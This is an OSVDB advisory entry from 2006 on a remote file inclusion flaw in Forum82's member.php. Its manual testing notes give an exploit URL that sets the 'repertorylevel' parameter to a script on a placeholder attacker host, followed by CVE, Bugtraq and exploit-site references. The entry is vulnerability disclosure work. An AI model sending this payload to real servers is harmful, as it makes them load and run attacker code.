Forum82 member.php repertorylevel Variable Remote File Inclusion

2006-09-29T15:03:54
ID OSVDB:29415
Type osvdb
Reporter OSVDB
Modified 2006-09-29T15:03:54

Description

Manual Testing Notes

http://[target]/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://[attacker]/evilscript.txt?

References:

Vendor URL: http://forum82.sourceforge.net/ Secunia Advisory ID:22214 Related OSVDB ID: 29414 Related OSVDB ID: 29413 Related OSVDB ID: 29417 Related OSVDB ID: 29419 Related OSVDB ID: 29416 Related OSVDB ID: 29418 Generic Exploit URL: http://www.milw0rm.com/exploits/2459 FrSIRT Advisory: ADV-2006-3865 CVE-2006-5148 Bugtraq ID: 20291